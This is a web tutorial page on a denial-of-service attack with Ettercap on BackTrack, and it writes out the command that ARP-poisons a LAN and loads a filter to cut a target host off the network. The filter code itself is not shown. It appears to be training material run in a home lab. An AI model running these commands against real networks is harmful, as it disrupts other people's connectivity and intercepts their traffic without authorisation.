| home |
| securityTopics |
| examples |
| downloads |
| furtherReading |
| contact |
| Denial of Service Attacks : Tools |
Using Ettercap we will perform a Denial of Service attack. Materials Needed: Step 1: Start BackTrack We will be using the security distribution Backtrack from http://www.remote-exploit.org due to it being preconfigured with most of the packages and tools we will be using. Any version of Linux will work for these tutorials, however you will need to install and configure the packages yourself before attempting these scenarios. Boot Backtrack and when you are prompted enter 'root' and the password 'toor' then set up your network connection. Step 2: Set up your Network connection If your network is configured with DHCP then issuing these commands from the terminal will usually suffice to set things up.
Step 3: Understanding Filters Ettercap has many built-in tools to allow all sorts of network activity from sniffing to ARP spoofing. It also has the ability to use filters to focus its activity. For example, we want to block a host from the network, the simplest way to do that is to not allow any packets to be sent to or from the host we wish to block. Ettercap filters allow us to do just that. Step 4: Let's Write a Filter At this point you should still be in the console in BackTrack, if you started the GUI open a shell and type the following commands:
Fire up a text-editor and type in this block of text, replacing 'Target IP' with the IP address of the host you wish to keep from sending or receiving packets, save it as dos.eft in the /usr/local/share/ettercap directory.
From the command-line nano is a very easy to use text-editor start it by typing:
Type in the text and save it by pressing Ctrl+x and then press 'Enter' twice. This scripting language is fairly straight forward. Our script looks to see if the Source IP OR Destination IP matches our target. If it does it drops the packet and sents a RST signal to the other machine our target was attempting to communicate with. It then outputs a message to our screen so we know a packet was dropped. Step 5: Compile our script Now we have our file dos.eft saved in /usr/local/share/ettercap/ and are ready to compile it. Ettercap uses a program called etterfilter to compile filter scripts into files usable by the program. To run it and compile our script we simply type:
Step 6: Start up Ettercap Our last example with Ettercap used the GTK interface, this time we will use the text based interface. root@slax> 'ettercap -T -q -F /usr/local/share/ettercap/dos.ef -M ARP /TARGET IP/ //' The slashes are important, what we've done is tell Ettercap to run in Text Mode (-T), quiet mode so not every packet is printed to the screen (-q) to load a filter (-F filename) to run a Man in the Middle Attack (-M Attack Type) and then finally told it what target we want to select with the slashes. We'll get into this in more detail later but for now we're telling Ettercap to poison communications between our target and everything else on the LAN Step 7: Test it Out For our tests we set up 1 laptop with the IP address of 192.168.1.209 this is our victim, another computer, running ettercap with this command: ettercap -T -q -F /usr/local/share/ettercap/dos.ef -M ARP /192.168.1.209/ // You should see a screen similar to this:
Our target is now effectively off the network and you've learned the basics of writing ettercap filters. To learn more about filters check the manpage for "etterfilter" as well as reading the examples in the files at /usr/local/share/ettercap/etter.filter.examples Step 8: Stop the MITM attack Press 'q' to stop the Man in the Middle attack and exit the program. |
